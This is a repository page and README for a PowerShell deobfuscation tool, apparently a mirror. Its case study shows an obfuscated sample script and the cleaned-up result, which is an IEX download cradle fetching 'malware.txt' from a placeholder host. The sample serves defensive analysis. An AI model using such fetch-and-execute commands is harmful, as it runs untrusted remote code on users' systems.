# Invoke-Deobfuscation

**Repository Path**: LZ1618/invoke-deobfuscation

## Basic Information

- **Project Name**: Invoke-Deobfuscation
- **Description**: Deobfuscation tool for PowerShell
- **Primary Language**: PowerShell
- **License**: Not specified
- **Default Branch**: main
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 1
- **Forks**: 1
- **Created**: 2023-03-20
- **Last Updated**: 2023-03-20

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

### Invoke-Deobfuscation

---

- Environment
    - Windows： PowerShell Shell
    - Linux: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2
    - MacOS: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.2


- How to use it？

    ~~~shell
    git clone https://gitee.com/snowroll/invoke-deobfuscation
    cd invoke-deobfuscation/Code
    pwsh  # Linux or MacOS
    Import-Module ./Invoke-DeObfuscation.psd1
    DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1  
    ~~~

- Case Study


    - demo.ps1

        ~~~powershell
        Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
        $xdjmd  =   'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
        $lsffs =   '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
        $sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
        .($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
        ~~~

    - Result

        ~~~powershell
        Write-Host hello
        $var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
        $var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
        $var2 = 'https://test.com/malware.txt'
        .('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
        ~~~